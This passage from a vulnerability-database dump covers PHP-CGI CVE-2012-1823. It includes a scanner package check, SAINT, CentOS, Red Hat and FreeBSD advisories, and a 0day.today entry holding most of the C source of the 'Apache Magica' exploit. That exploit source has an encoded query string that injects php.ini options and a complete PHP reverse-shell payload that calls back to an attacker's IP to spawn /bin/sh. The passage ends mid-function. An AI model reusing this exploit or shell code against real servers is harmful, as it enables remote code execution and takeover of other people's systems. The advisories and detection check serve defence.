security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-tokenizer\", rpm:\"php-tokenizer~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-wddx\", rpm:\"php-wddx~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlreader\", rpm:\"php-xmlreader~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlwriter\", rpm:\"php-xmlwriter~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xsl\", rpm:\"php-xsl~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-zip\", rpm:\"php-zip~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "saint": [{"lastseen": "2019-05-29T19:19:26", "bulletinFamily": "exploit", "description": "Added: 05/15/2012 \nCVE: [CVE-2012-1823](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823>) \nBID: [53388](<http://www.securityfocus.com/bid/53388>) \nOSVDB: [81633](<http://www.osvdb.org/81633>) \n\n\n### Background\n\nPHP is a widely used general-purpose scripting language that is especially suited for Web development. \n\n### Problem\n\nWhen configured as a CGI script (aka php-cgi), PHP does not properly handle query string parameters which are passed directly to the php-cgi program. This can be exploited to execute arbitrary system commands or disclose the PHP source code. \n\n### Resolution\n\nUpgrade PHP to version 5.4.3 or 5.3.13 or higher. \n\n### References\n\n<http://secunia.com/advisories/49014> \n<http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823> \n\n\n### Limitations\n\nThis exploit has been tested against PHP 5.3.10 on Windows XP SP3 and PHP 5.4.0 on Ubuntu 11.10 Linux. \n\n### Platforms\n\nWindows \nLinux \nMac OS X \n \n\n", "modified": "2012-05-15T00:00:00", "published": "2012-05-15T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/php_cgi_arg_rce", "id": "SAINT:4757B9E50DEDA6FBFE3C977620C279FB", "type": "saint", "title": "PHP CGI Query String Parameters Command Execution", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "description": "Added: 05/15/2012 \nCVE: [CVE-2012-1823](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823>) \nBID: [53388](<http://www.securityfocus.com/bid/53388>) \nOSVDB: [81633](<http://www.osvdb.org/81633>) \n\n\n### Background\n\nPHP is a widely used general-purpose scripting language that is especially suited for Web development. \n\n### Problem\n\nWhen configured as a CGI script (aka php-cgi), PHP does not properly handle query string parameters which are passed directly to the php-cgi program. This can be exploited to execute arbitrary system commands or disclose the PHP source code. \n\n### Resolution\n\nUpgrade PHP to version 5.4.3 or 5.3.13 or higher. \n\n### References\n\n<http://secunia.com/advisories/49014> \n<http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823> \n\n\n### Limitations\n\nThis exploit has been tested against PHP 5.3.10 on Windows XP SP3 and PHP 5.4.0 on Ubuntu 11.10 Linux. \n\n### Platforms\n\nWindows \nLinux \nMac OS X \n \n\n", "modified": "2012-05-15T00:00:00", "published": "2012-05-15T00:00:00", "id": "SAINT:A44F3BA5218E70289A3DA48E0A2F5B88", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/php_cgi_arg_rce", "type": "saint", "title": "PHP CGI Query String Parameters Command Execution", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:30", "bulletinFamily": "exploit", "description": "Added: 05/15/2012 \nCVE: [CVE-2012-1823](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823>) \nBID: [53388](<http://www.securityfocus.com/bid/53388>) \nOSVDB: [81633](<http://www.osvdb.org/81633>) \n\n\n### Background\n\nPHP is a widely used general-purpose scripting language that is especially suited for Web development. \n\n### Problem\n\nWhen configured as a CGI script (aka php-cgi), PHP does not properly handle query string parameters which are passed directly to the php-cgi program. This can be exploited to execute arbitrary system commands or disclose the PHP source code. \n\n### Resolution\n\nUpgrade PHP to version 5.4.3 or 5.3.13 or higher. \n\n### References\n\n<http://secunia.com/advisories/49014> \n<http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823> \n\n\n### Limitations\n\nThis exploit has been tested against PHP 5.3.10 on Windows XP SP3 and PHP 5.4.0 on Ubuntu 11.10 Linux. \n\n### Platforms\n\nWindows \nLinux \nMac OS X \n \n\n", "modified": "2012-05-15T00:00:00", "published": "2012-05-15T00:00:00", "id": "SAINT:383F4FB67DCF7CAE7E06F44A5B5DC13F", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/php_cgi_arg_rce", "title": "PHP CGI Query String Parameters Command Execution", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:29:37", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2012:0547\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command line\narguments when running in CGI mode. A remote attacker could send a \nspecially-crafted request to a PHP script that would result in the query\nstring being parsed by php-cgi as command line options and arguments. This \ncould lead to the disclosure of the script's source code or arbitrary code \nexecution with the privileges of the PHP interpreter. (CVE-2012-1823) \n\nRed Hat is aware that a public exploit for this issue is available that \nallows remote code execution in affected PHP CGI configurations. This flaw \ndoes not affect the default configuration using the PHP module for Apache \nhttpd to handle PHP scripts.\n\nAll php53 users should upgrade to these updated packages, which contain a\nbackported patch to resolve this issue. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-May/030655.html\n\n**Affected packages:**\nphp53\nphp53-bcmath\nphp53-cli\nphp53-common\nphp53-dba\nphp53-devel\nphp53-gd\nphp53-imap\nphp53-intl\nphp53-ldap\nphp53-mbstring\nphp53-mysql\nphp53-odbc\nphp53-pdo\nphp53-pgsql\nphp53-process\nphp53-pspell\nphp53-snmp\nphp53-soap\nphp53-xml\nphp53-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0547.html", "modified": "2012-05-07T23:01:16", "published": "2012-05-07T23:01:16", "href": "http://lists.centos.org/pipermail/centos-announce/2012-May/030655.html", "id": "CESA-2012:0547", "title": "php53 security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:25:51", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2012:0546\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command line\narguments when running in CGI mode. A remote attacker could send a\nspecially-crafted request to a PHP script that would result in the query\nstring being parsed by php-cgi as command line options and arguments. This\ncould lead to the disclosure of the script's source code or arbitrary code\nexecution with the privileges of the PHP interpreter. (CVE-2012-1823)\n\nRed Hat is aware that a public exploit for this issue is available that\nallows remote code execution in affected PHP CGI configurations. This flaw\ndoes not affect the default configuration in Red Hat Enterprise Linux 5 and\n6 using the PHP module for Apache httpd to handle PHP scripts.\n\nAll php users should upgrade to these updated packages, which contain a\nbackported patch to resolve this issue. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-May/030651.html\nhttp://lists.centos.org/pipermail/centos-announce/2012-May/030652.html\n\n**Affected packages:**\nphp\nphp-bcmath\nphp-cli\nphp-common\nphp-dba\nphp-devel\nphp-embedded\nphp-enchant\nphp-gd\nphp-imap\nphp-intl\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pdo\nphp-pgsql\nphp-process\nphp-pspell\nphp-recode\nphp-snmp\nphp-soap\nphp-tidy\nphp-xml\nphp-xmlrpc\nphp-zts\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0546.html", "modified": "2012-05-07T22:48:54", "published": "2012-05-07T21:09:19", "href": "http://lists.centos.org/pipermail/centos-announce/2012-May/030651.html", "id": "CESA-2012:0546", "title": "php security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:46:23", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command line\narguments when running in CGI mode. A remote attacker could send a \nspecially-crafted request to a PHP script that would result in the query\nstring being parsed by php-cgi as command line options and arguments. This \ncould lead to the disclosure of the script's source code or arbitrary code \nexecution with the privileges of the PHP interpreter. (CVE-2012-1823) \n\nRed Hat is aware that a public exploit for this issue is available that \nallows remote code execution in affected PHP CGI configurations. This flaw \ndoes not affect the default configuration using the PHP module for Apache \nhttpd to handle PHP scripts.\n\nAll php53 users should upgrade to these updated packages, which contain a\nbackported patch to resolve this issue. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n", "modified": "2017-09-08T12:19:51", "published": "2012-05-07T04:00:00", "id": "RHSA-2012:0547", "href": "https://access.redhat.com/errata/RHSA-2012:0547", "type": "redhat", "title": "(RHSA-2012:0547) Critical: php53 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:56", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command line\narguments when running in CGI mode. A remote attacker could send a\nspecially-crafted request to a PHP script that would result in the query\nstring being parsed by php-cgi as command line options and arguments. This\ncould lead to the disclosure of the script's source code or arbitrary code\nexecution with the privileges of the PHP interpreter. (CVE-2012-1823)\n\nRed Hat is aware that a public exploit for this issue is available that\nallows remote code execution in affected PHP CGI configurations. This flaw\ndoes not affect the default configuration using the PHP module for Apache\nhttpd to handle PHP scripts.\n\nAll php53 users should upgrade to these updated packages, which contain a\nbackported patch to resolve this issue. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n", "modified": "2017-09-08T12:09:34", "published": "2012-05-10T04:00:00", "id": "RHSA-2012:0569", "href": "https://access.redhat.com/errata/RHSA-2012:0569", "type": "redhat", "title": "(RHSA-2012:0569) Critical: php53 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:47", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command line\narguments when running in CGI mode. A remote attacker could send a\nspecially-crafted request to a PHP script that would result in the query\nstring being parsed by php-cgi as command line options and arguments. This\ncould lead to the disclosure of the script's source code or arbitrary code\nexecution with the privileges of the PHP interpreter. (CVE-2012-1823)\n\nRed Hat is aware that a public exploit for this issue is available that\nallows remote code execution in affected PHP CGI configurations. This flaw\ndoes not affect the default configuration in Red Hat Enterprise Linux 5 and\n6 using the PHP module for Apache httpd to handle PHP scripts.\n\nAll php users should upgrade to these updated packages, which contain a\nbackported patch to resolve this issue. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n", "modified": "2018-06-06T20:24:05", "published": "2012-05-07T04:00:00", "id": "RHSA-2012:0546", "href": "https://access.redhat.com/errata/RHSA-2012:0546", "type": "redhat", "title": "(RHSA-2012:0546) Critical: php security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:47:03", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command line\narguments when running in CGI mode. A remote attacker could send a\nspecially-crafted request to a PHP script that would result in the query\nstring being parsed by php-cgi as command line options and arguments. This\ncould lead to the disclosure of the script's source code or arbitrary code\nexecution with the privileges of the PHP interpreter. (CVE-2012-1823)\n\nRed Hat is aware that a public exploit for this issue is available that\nallows remote code execution in affected PHP CGI configurations. This flaw\ndoes not affect the default configuration in Red Hat Enterprise Linux 5 and\n6 using the PHP module for Apache httpd to handle PHP scripts.\n\nAll php users should upgrade to these updated packages, which contain a\nbackported patch to resolve this issue. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n", "modified": "2017-09-08T12:08:16", "published": "2012-05-10T04:00:00", "id": "RHSA-2012:0568", "href": "https://access.redhat.com/errata/RHSA-2012:0568", "type": "redhat", "title": "(RHSA-2012:0568) Critical: php security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:53", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command line\narguments when running in CGI mode. A remote attacker could send a\nspecially-crafted request to a PHP script that would result in the query\nstring being parsed by php-cgi as command line options and arguments. This\ncould lead to the disclosure of the script's source code or arbitrary code\nexecution with the privileges of the PHP interpreter. (CVE-2012-1823)\n\nRed Hat is aware that a public exploit for this issue is available that\nallows remote code execution in affected PHP CGI configurations. This flaw\ndoes not affect the default configuration using the PHP module for Apache\nhttpd to handle PHP scripts.\n\nAll php users should upgrade to these updated packages, which contain a\nbackported patch to resolve this issue. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n", "modified": "2019-03-22T23:44:34", "published": "2012-05-11T04:00:00", "id": "RHSA-2012:0570", "href": "https://access.redhat.com/errata/RHSA-2012:0570", "type": "redhat", "title": "(RHSA-2012:0570) Critical: php security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:50", "bulletinFamily": "unix", "description": "\nphp development team reports:\n\nSecurity Enhancements and Fixes in PHP 5.3.12:\n\nInitial fix for cgi-bin ?-s cmdarg parse issue\n\t (CVE-2012-1823)\n\n\n", "modified": "2012-05-03T00:00:00", "published": "2012-05-03T00:00:00", "id": "60DE13D5-95F0-11E1-806A-001143CD36D8", "href": "https://vuxml.freebsd.org/freebsd/60de13d5-95f0-11e1-806a-001143cd36d8.html", "title": "php -- vulnerability in certain CGI-based setups", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-04-10T01:47:15", "bulletinFamily": "exploit", "description": "Apache and PHP remote command execution exploit that leverages php5-cgi.", "modified": "2013-10-31T00:00:00", "published": "2013-10-31T00:00:00", "id": "1337DAY-ID-21429", "href": "https://0day.today/exploit/description/21429", "type": "zdt", "title": "Apache Magicka Remote Code Execution Vulnerability", "sourceData": "/* Apache Magica by Kingcope */\r\n/* gcc apache-magika.c -o apache-magika -lssl */\r\n/* This is a code execution bug in the combination of Apache and PHP.\r\nOn Debian and Ubuntu the vulnerability is present in the default install\r\nof the php5-cgi package. When the php5-cgi package is installed on Debian and\r\nUbuntu or php-cgi is installed manually the php-cgi binary is accessible under\r\n/cgi-bin/php5 and /cgi-bin/php. The vulnerability makes it possible to execute\r\nthe binary because this binary has a security check enabled when installed with\r\nApache http server and this security check is circumvented by the exploit.\r\nWhen accessing the php-cgi binary the security check will block the request and\r\nwill not execute the binary.\r\nIn the source code file sapi/cgi/cgi_main.c of PHP we can see that the security\r\ncheck is done when the php.ini configuration setting cgi.force_redirect is set\r\nand the php.ini configuration setting cgi.redirect_status_env is set to no.\r\nThis makes it possible to execute the binary bypassing the Security check by\r\nsetting these two php.ini settings.\r\nPrior to this code for the Security check getopt is called and it is possible\r\nto set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the\r\n-d switch. If both values are set to zero and the request is sent to the server\r\nphp-cgi gets fully executed and we can use the payload in the POST data field\r\nto execute arbitrary php and therefore we can execute programs on the system.\r\napache-magika.c is an exploit that does exactly the prior described. It does\r\nsupport SSL.\r\n/* Affected and tested versions\r\nPHP 5.3.10\r\nPHP 5.3.8-1\r\nPHP 5.3.6-13\r\nPHP 5.3.3\r\nPHP 5.2.17\r\nPHP 5.2.11\r\nPHP 5.2.6-3\r\nPHP 5.2.6+lenny16 with Suhosin-Patch\r\nAffected versions\r\nPHP prior to 5.3.12\r\nPHP prior to 5.4.2\r\nUnaffected versions\r\nPHP 4 - getopt parser unexploitable\r\nPHP 5.3.12 and up\r\nPHP 5.4.2 and up\r\nUnaffected versions are patched by CVE-2012-1823.\r\n*/\r\n/* .\r\n /'\\rrq rk\r\n . // \\\\ .\r\n.x.//fco\\\\-|-\r\n '//cmtco\\\\zt\r\n //6meqrg.\\\\tq\r\n//_________\\\\'\r\nEJPGQO\r\napache-magica.c by Kingcope\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <sys/types.h>\r\n#include <stddef.h>\r\n#include <openssl/rand.h>\r\n#include <openssl/ssl.h>\r\n#include <openssl/err.h>\r\n#include <netdb.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n\r\ntypedef struct {\r\n int sockfd;\r\n SSL *handle;\r\n SSL_CTX *ctx;\r\n} connection;\r\n\r\nvoid usage(char *argv[])\r\n{\r\n printf(\"usage: %s <--target target> <--port port> <--protocol http|https> \" \\\r\n \"<--reverse-ip ip> <--reverse-port port> [--force-interpreter interpreter]\\n\",\r\n argv[0]);\r\n exit(1);\r\n}\r\n\r\nchar poststr[] = \"POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F\" \\\r\n \"%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64\" \\\r\n \"+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73\" \\\r\n \"%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E\" \\\r\n \"%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63\" \\\r\n \"%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62\" \\\r\n \"%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74\" \\\r\n \"%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68\" \\\r\n \"%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F\" \\\r\n \"%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63\" \\\r\n \"%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73\" \\\r\n \"%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\\r\\n\" \\\r\n \"Host: %s\\r\\n\" \\\r\n \"User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26\" \\\r\n \"(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\\r\\n\" \\\r\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\" \\\r\n \"Content-Length: %d\\r\\n\" \\\r\n \"Connection: close\\r\\n\\r\\n%s\";\r\nchar phpstr[] = \"<?php\\n\" \\\r\n\"set_time_limit(0);\\n\" \\\r\n\"$ip = '%s';\\n\" \\\r\n\"$port = %d;\\n\" \\\r\n\"$chunk_size = 1400;\\n\" \\\r\n\"$write_a = null;\\n\" \\\r\n\"$error_a = null;\\n\" \\\r\n\"$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';\\n\" \\\r\n\"$daemon = 0;\\n\" \\\r\n\"$debug = 0;\\n\" \\\r\n\"if (function_exists('pcntl_fork')) {\\n\" \\\r\n\" $pid = pcntl_fork(); \\n\" \\\r\n\" if ($pid == -1) {\\n\" \\\r\n\" printit(\\\"ERROR: Can't fork\\\");\\n\" \\\r\n\" exit(1);\\n\" \\\r\n\" }\\n\" \\\r\n\" if ($pid) {\\n\" \\\r\n\" exit(0);\\n\" \\\r\n\" }\\n\" \\\r\n\" if (posix_setsid() == -1) {\\n\" \\\r\n\" printit(\\\"Error: Can't setsid()\\\");\\n\" \\\r\n\" exit(1);\\n\" \\\r\n\" }\\n\" \\\r\n\" $daemon = 1;\\n\" \\\r\n\"} else {\\n\" \\\r\n\" printit(\\\"WARNING: Failed to daemonise.\\\");\\n\" \\\r\n\"}\\n\" \\\r\n\"chdir(\\\"/\\\");\\n\" \\\r\n\"umask(0);\\n\" \\\r\n\"$sock = fsockopen($ip, $port, $errno, $errstr, 30);\\n\" \\\r\n\"if (!$sock) {\\n\" \\\r\n\" printit(\\\"$errstr ($errno)\\\");\\n\" \\\r\n\" exit(1);\\n\" \\\r\n\"}\\n\" \\\r\n\"$descriptorspec = array(\\n\" \\\r\n\" 0 => array(\\\"pipe\\\", \\\"r\\\"),\\n\" \\\r\n\" 1 => array(\\\"pipe\\\", \\\"w\\\"),\\n\" \\\r\n\" 2 => array(\\\"pipe\\\", \\\"w\\\")\\n\" \\\r\n\");\\n\" \\\r\n\"$process = proc_open($shell, $descriptorspec, $pipes);\\n\" \\\r\n\"if (!is_resource($process)) {\\n\" \\\r\n\" printit(\\\"ERROR: Can't spawn shell\\\");\\n\" \\\r\n\" exit(1);\\n\" \\\r\n\"}\\n\" \\\r\n\"stream_set_blocking($pipes[0], 0);\\n\" \\\r\n\"stream_set_blocking($pipes[1], 0);\\n\" \\\r\n\"stream_set_blocking($pipes[2], 0);\\n\" \\\r\n\"stream_set_blocking($sock, 0);\\n\" \\\r\n\"while (1) {\\n\" \\\r\n\" if (feof($sock)) {\\n\" \\\r\n\" printit(\\\"ERROR: Shell connection terminated\\\");\\n\" \\\r\n\" break;\\n\" \\\r\n\" }\\n\" \\\r\n\" if (feof($pipes[1])) {\\n\" \\\r\n\" printit(\\\"ERROR: Shell process terminated\\\");\\n\" \\\r\n\" break;\\n\" \\\r\n\" }\\n\" \\\r\n\" $read_a = array($sock, $pipes[1], $pipes[2]);\\n\" \\\r\n\" $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\\n\" \\\r\n\" if (in_array($sock, $read_a)) {\\n\" \\\r\n\" if ($debug) printit(\\\"SOCK READ\\\");\\n\" \\\r\n\" $input = fread($sock, $chunk_size);\\n\" \\\r\n\" if ($debug) printit(\\\"SOCK: $input\\\");\\n\" \\\r\n\" fwrite($pipes[0], $input);\\n\" \\\r\n\" }\\n\" \\\r\n\" if (in_array($pipes[1], $read_a)) {\\n\" \\\r\n\" if ($debug) printit(\\\"STDOUT READ\\\");\\n\" \\\r\n\" $input = fread($pipes[1], $chunk_size);\\n\" \\\r\n\" if ($debug) printit(\\\"STDOUT: $input\\\");\\n\" \\\r\n\" fwrite($sock, $input);\\n\" \\\r\n\" }\\n\" \\\r\n\" if (in_array($pipes[2], $read_a)) {\\n\" \\\r\n\" if ($debug) printit(\\\"STDERR READ\\\");\\n\" \\\r\n\" $input = fread($pipes[2], $chunk_size);\\n\" \\\r\n\" if ($debug) printit(\\\"STDERR: $input\\\");\\n\" \\\r\n\" fwrite($sock, $input);\\n\" \\\r\n\" }\\n\" \\\r\n\"}\\n\" \\\r\n\"\\n\" \\\r\n\"fclose($sock);\\n\" \\\r\n\"fclose($pipes[0]);\\n\" \\\r\n\"fclose($pipes[1]);\\n\" \\\r\n\"fclose($pipes[2]);\\n\" \\\r\n\"proc_close($process);\\n\" \\\r\n\"function printit ($string) {\\n\" \\\r\n\" if (!$daemon) {\\n\" \\\r\n\" print \\\"$string\\n\\\";\\n\" \\\r\n\" }\\n\" \\\r\n\"}\\n\" \\\r\n\"exit(1);\\n\" \\\r\n\"?>\";\r\n\r\nstruct sockaddr_in *gethostbyname_(char *hostname, unsigned short port)\r\n{\r\n struct hostent *he;\r\n struct sockaddr_in server, *servercopy;\r\n \r\n if ((he=gethostbyname(hostname)) == NULL) {\r\n printf(\"Hostname cannot be resolved\\n\");\r\n exit(255);\r\n }\r\n \r\n servercopy = malloc(sizeof(struct sockaddr_in));\r\n if (!servercopy) {\r\n printf(\"malloc error (1)\\n\");\r\n exit(255);\r\n }\r\n memset(&server, '\\0', sizeof(struct sockaddr_in));\r\n memcpy(&server.sin_addr, he->h_addr_list[0], he->h_length);\r\n server.sin_family = AF_INET;\r\n server.sin_port = htons(port);\r\n memcpy(servercopy, &server, sizeof(struct sockaddr_in));\r\n return servercopy;\r\n}\r\n\r\nchar *sslread(connection *c)\r\n{\r\n char *rc = NULL;\r\n int received, count = 0, count2=0;\r\n char ch;\r\n\r\n for(;;)\r\n {\r\n if (!rc)\r\n rc = calloc(1024, sizeof (char) + 1);\r\n else\r\n if (count2 % 1024 == 0) {\r\n rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);\r\n }\r\n received = SSL_read(c->handle, &ch, 1);\r\n if (received == 1) {\r\n rc[count++] = ch;\r\n count2++;\r\n if (count2 > 1024*5)\r\n break;\r\n }\r\n else\r\n break;\r\n }\r\n return rc;\r\n}\r\n\r\nchar *read_(int sockfd)\r\n{\r\n char *rc = NULL;\r\n int received, count = 0, count2=0;\r\n char ch;\r\n\r\n for(;;)\r\n {\r\n if (!rc)\r\n rc = calloc(1024, sizeof (char) + 1);\r\n else\r\n if (count2 % 1024 == 0) {\r\n rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);\r\n }\r\n received = read(sockfd, &ch, 1);\r\n if (received == 1) {\r\n rc[count++] = ch;\r\n count2++;\r\n if (count2 > 1024*5)\r\n break;\r\n }\r\n else\r\n break;\r\n }\r\n return rc;\r\n}\r\n\r\nvoid main(int argc, char *argv[])\r\n{\r\n char *target, *protocol, *targetip, *writestr, *tmpstr, *readbuf=NULL,\r\n *interpreter, *reverseip, *reverseportstr, *forceinterpreter=NULL;\r\n char httpsflag=0;\r\n unsigned short port=0, reverseport=0;\r\n struct sockaddr_in *server;\r\n int sockfd;\r\n unsigned int writesize, tmpsize;\r\n unsigned int i;\r\n connection *sslconnection;\r\n printf(\"-== Apache Magika by Kingcope ==-\\n\");\r\n for(;;)\r\n {\r\n int c;\r\n int option_index=0;\r\n static struct option long_options[] = {\r\n {\"target\", required_argument, 0, 0 },\r\n {\"port\", required_argument, 0, 0 },\r\n {\"protocol\", required_argument, 0, 0 },\r\n {\"reverse-ip\", required_argument, 0, 0 },\r\n {\"reverse-port\", required_argument, 0, 0 },\r\n {\"force-interpreter\", required_argument, 0, 0 }, \r\n {0, 0, 0, 0 }\r\n };\r\n \r\n c = getopt_long(argc, argv, \"\", long_options, &option_index);\r\n if (c < 0)\r\n break;\r\n \r\n switch (c) {\r\n case 0:\r\n switch (option_index) {\r\n case 0:\r\n if (optarg) {\r\n target = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!target) {\r\n printf(\"calloc error (2)\\n\");\r\n exit(255);\r\n }\r\n memcpy(target, optarg, strlen(optarg)+1);\r\n }\r\n break;\r\n case 1:\r\n if(optarg)\r\n port = atoi(optarg);\r\n break;\r\n case 2:\r\n protocol = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!protocol) {\r\n printf(\"calloc error (3)\\n\");\r\n exit(255);\r\n }\r\n memcpy(protocol, optarg, strlen(optarg)+1);\r\n if (!strcmp(protocol, \"https\"))\r\n httpsflag=1;\r\n break;\r\n case 3:\r\n reverseip = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!reverseip) {\r\n printf(\"calloc error (4)\\n\");\r\n exit(255);\r\n }\r\n memcpy(reverseip, optarg, strlen(optarg)+1); \r\n break;\r\n case 